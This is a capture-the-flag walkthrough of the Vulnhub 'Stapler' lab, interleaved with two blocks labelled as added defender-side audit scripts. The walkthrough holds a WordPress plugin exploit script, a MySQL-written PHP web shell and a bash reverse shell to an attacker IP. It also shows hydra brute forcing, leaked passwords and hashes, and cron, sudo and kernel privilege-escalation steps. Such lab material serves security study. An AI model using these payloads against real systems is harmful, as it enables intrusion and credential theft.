[Vulnhub] Stapler: wp-videos + ftp + smb + bash_history privilege escalation + SUID privilege escalation + kernel privilege escalation

Posted on 2026-4-24 08:51:40

Information gathering

IP Address      Open Ports
192.168.8.106   TCP: 21,22,53,80,123,137,138,139,666,3306

Using Nmap for scanning:
$ nmap -p- 192.168.8.106 --min-rate 1000 -sC -sV
The results are as follows:
PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.35.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssh-hostkey:
|   2048 8121cea11a05b1694f4ded8028e89905 (RSA)
|   256 5ba5bb67911a51c2d321dac0caf0db9e (ECDSA)
|_  256 6d01b773acb0936ffab989e6ae3cabd3 (ED25519)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
53/tcp    open   domain      dnsmasq 2.75
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| dns-nsid:
|_  bind.version: dnsmasq-2.75
80/tcp    open   http        PHP cli server 5.5 or later
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_http-title: 404 Not Found
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
666/tcp   open   doom?
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
|   NULL:
|     message2.jpgUT
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| mysql-info:
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 7
|   Capabilities flags: 63487
|   Some Capabilities: ODBCClient, Support41Auth, Speaks41ProtocolOld, SupportsLoadDataLocal, SupportsTransactions, LongPassword, LongColumnFlag, FoundRows, InteractiveClient, SupportsCompression, DontAllowDatabaseTableColumn, IgnoreSigpipes, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt:       W#C\x0C@-\x7F%fA^~o
| TSI\x14,
|_  Auth Plugin Name: mysql_native_password
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_http-server-header: Apache/2.4.18 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:B7:CF:DD (Oracle VirtualBox virtual NIC)
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
|_clock-skew: mean: 7h59m57s, deviation: 0s, median: 7h59m57s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-07-12T15:23:57
|_  start_date: N/A
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
Local access: HTTPS 12380


https://192.168.35.101:12380/

$ dirb https://192.168.35.101:12380
https://192.168.35.101:12380/robots.txt

https://192.168.35.101:12380/blogblog/

$ wpscan --url "https://192.168.35.101:12380/blogblog/" --enumerate ap,u --disable-tls-checks
[+] Name: advanced-video-embed-embed-videos-or-playlists - v1.0
|  Latest version: 1.0 (up to date)
|  Location: https://192.168.56.102:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
|  Readme: https://192.168.56.102:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
[!] Directory listing is enabled: https://192.168.56.102:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
import random
import urllib2
import re
import ssl

# The target uses a self-signed certificate, so skip TLS verification
ssl._create_default_https_context = ssl._create_unverified_context
url = "https://192.168.35.101:12380/blogblog"  # insert url to wordpress

# Create a post through the plugin's unauthenticated AJAX action; the "thumb"
# parameter points at wp-config.php, which the plugin copies into uploads
randomID = long(random.random() * 100000000000000000L)
objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content = objHtml.readlines()
post_id = None
for line in content:
    numbers = re.findall(r'\d+', line)
    if numbers:  # skip lines without digits instead of raising IndexError
        post_id = int(numbers[-1]) / 10

# Fetch the new post and read back the attachment that now holds wp-config.php
objHtml = urllib2.urlopen(url + '/?p=' + str(post_id))
content = objHtml.readlines()
for line in content:
    if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
        urls = re.findall('"(https?://.*?)"', line)
        print urllib2.urlopen(urls[0]).read()
$ python2 exp.py
https://192.168.35.101:12380/blogblog/wp-content/uploads/
$ curl -k https://192.168.35.101:12380/blogblog/wp-content/uploads/403901558.jpeg

username:root
password:plbkac
https://192.168.35.101:12380/phpmyadmin/sql.php?db=wordpress&table=wp_users&token=ef508c27b38a40a06a809e25d1c54027&pos=0
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| John       | $P$B7889EMq/erHIuZapMB8GEizebcIy9. |
| Elly       | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 |
| Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 |
| barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 |
| heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 |
| garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 |
| harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 |
| scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 |
| kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 |
| tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 |
| ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 |
| Dave       | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. |
| Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 |
| Abby       | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. |
| Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 |
| Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 |
+------------+------------------------------------+
mysql> SELECT user, host, File_priv FROM mysql.user;

mysql> select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
https://192.168.8.106:12380/blogblog/wp-content/uploads/shell.php?cmd=%2fbin%2fbash+-c+%27bash+%3e%26+%2fdev%2ftcp%2f192.168.8.107%2f10032+0%3e%261%27
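As an added defender-side check, not part of the original post: the INTO OUTFILE step drops shell.php into wp-content/uploads, a directory that should only hold media. The POSIX shell functions below list PHP files under an uploads directory that call command-execution functions, count any PHP there at all, and print an Apache 2.4 .htaccess fragment that refuses to execute PHP in that directory. The uploads path, and that AllowOverride permits FilesMatch/Require in .htaccess, are assumptions.

```shell
#!/bin/sh
# Added defender-side check (not from the original post): audit a WordPress
# uploads directory for PHP files like the shell.php written via INTO OUTFILE.
# Assumes POSIX sh, find(1) and grep -E; the uploads path is a parameter.

# Print PHP files under the uploads directory that reference command-execution
# functions, prefixed with "SUSPECT:". Returns 1 if any, 0 if the tree is clean.
scan_uploads_for_webshells() {
    uploads_dir="$1"
    suspects=$(find "$uploads_dir" -type f \
            \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' \) \
            -exec grep -lE 'shell_exec|passthru|proc_open|popen|(system|exec|eval)[[:space:]]*\(' {} + \
            2>/dev/null) || true
    [ -n "$suspects" ] || return 0
    printf '%s\n' "$suspects" | sed 's/^/SUSPECT: /'
    return 1
}

# Number of PHP files under uploads regardless of content. WordPress never
# needs PHP here, so a non-zero count is a finding on its own.
php_count_in_uploads() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' \) \
        2>/dev/null | wc -l | tr -d ' '
}

# Apache 2.4 .htaccess fragment that stops PHP execution in uploads even when a
# file does land there (assumes AllowOverride permits FilesMatch and Require).
uploads_htaccess() {
    cat <<'EOF'
# wp-content/uploads/.htaccess: media only, never execute PHP here
<FilesMatch "\.(php[0-9]?|phtml|phar)$">
    Require all denied
</FilesMatch>
EOF
}
```

Run `scan_uploads_for_webshells /var/www/https/blogblog/wp-content/uploads` from cron or a file-integrity job; a non-zero exit is the alert condition.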

Local access: brute force

$ enum4linux 192.168.8.106
Enumerate SMB users


$ cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
peter
RNunemaker
ETollefson
DSwanger
AParnell
SHayslett
MBassin
JBare
LSolum
IChadwick
MFrei
SStroud
CCeaser
JKanode
CJoo
Eeth
LSolum2
JLipps
jamie
Sam
Drew
jess
SHAY
Taylor
mel
kai
zoe
NATHAN
www
elly
$ hydra -L users.txt -e nsr ftp://192.168.8.106

-e nsr: enable additional password attempts
n: try an empty password (no password entered).
s: try the username as the password.
r: try the reversed username as the password.
username:SHayslett
password:SHayslett
username:elly
password:ylle
(elly)ftp> get passwd
root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
nobody
systemd-timesync
systemd-network
systemd-resolve
systemd-bus-proxy
syslog
_apt
lxd
dnsmasq
messagebus
sshd
peter
mysql
RNunemaker
ETollefson
DSwanger
AParnell
SHayslett
MBassin
JBare
LSolum
IChadwick
MFrei
SStroud
CCeaser
JKanode
CJoo
Eeth
LSolum2
JLipps
jamie
Sam
Drew
jess
SHAY
Taylor
mel
kai
zoe
NATHAN
www
postfix
ftp
elly
$ hydra -L users.txt -e nsr ssh://192.168.8.106


Privilege escalation: Bash history

/home$ find -name ".bash_history" -exec cat {} \;

username:JKanode
password:thisimypassword
username:peter
password:JZQuyIN5
$ su peter
$ sudo -l
$ sudo find . -exec /bin/sh \; -quit

Privilege escalation: SUID

Search for potential Linux privilege escalation weaknesses
http://www.securitysift.com/download/linuxprivchecker.py
$ python linuxprivchecker.py


Monitoring processes with pspy32 also shows that this is a scheduled task running as root.

$ echo -e 'chown root:root /tmp/setuid;chmod 4777 /tmp/setuid;' > /usr/local/sbin/cron-logrotate.sh
$ echo -e '#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > /tmp/setuid.c
$ gcc /tmp/setuid.c -o /tmp/setuid
Wait for the scheduled task to run

$ /tmp/setuid
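An added defender-side audit, not from the original post, for the two artifacts this step depends on: a cron script that users other than the account running it can modify, and a setuid binary left in a world-writable directory such as /tmp. It assumes POSIX sh with GNU stat(1) and GNU find(1); the crontab path and the uid the entries run as are parameters.

```shell
#!/bin/sh
# Added defender-side audit (not from the original post) for the weakness
# abused above: a root cron job that executes a script other users can write.
# Assumes POSIX sh, GNU stat(1) (stat -c) and GNU find(1).

# Print each absolute path named in the command field of a crontab file,
# skipping comments and VARIABLE=value lines such as SHELL=/bin/sh.
cron_script_paths() {
    grep -Ev '^[[:space:]]*(#|[A-Za-z_]+=)' "$1" \
        | grep -oE '(^|[[:space:]])/[^[:space:];&|>]+' \
        | tr -d ' \t' | sort -u
}

# Return 1 (and print a finding) when the script is writable by group or
# others, or is not owned by the uid the cron entry runs as (default 0, root).
cron_script_is_weak() {
    script="$1"; run_as_uid="${2:-0}"
    [ -f "$script" ] || return 0        # absent script: nothing to hijack here
    mode=$(stat -c '%a' "$script")      # octal without leading zero, e.g. 777
    owner=$(stat -c '%u' "$script")
    group_bits=$(( (mode / 10) % 10 ))  # second-to-last octal digit
    other_bits=$(( mode % 10 ))         # last octal digit; bit 2 is "write"
    if [ "$owner" -ne "$run_as_uid" ] || [ $((group_bits & 2)) -ne 0 ] \
            || [ $((other_bits & 2)) -ne 0 ]; then
        echo "WEAK: $script mode=$mode uid=$owner (cron runs it as uid $run_as_uid)"
        return 1
    fi
    return 0
}

# Audit every script referenced from a crontab; entries are assumed to run as
# the given uid (default root, like the logrotate job above).
audit_crontab() {
    rc=0
    for p in $(cron_script_paths "$1"); do
        cron_script_is_weak "$p" "${2:-0}" || rc=1
    done
    return $rc
}

# Setuid executables inside a world-writable directory (default /tmp) are the
# residue of exactly the chown/chmod 4777 step shown above.
setuid_files_in() {
    find "${1:-/tmp}" -xdev -type f -perm -4000 2>/dev/null
}
```

`audit_crontab /etc/crontab` plus `setuid_files_in /tmp` cover both sides of this escalation; the fix for a WEAK finding is root ownership and mode 0755 or stricter on the script.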

Privilege escalation: kernel

$ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
$ unzip 39772.zip
$ cd 39772
$ tar -xvf exploit.tar
$ cd ebpf_mapfd_doubleput_exploit
$ ./compile.sh
$ ./doubleput
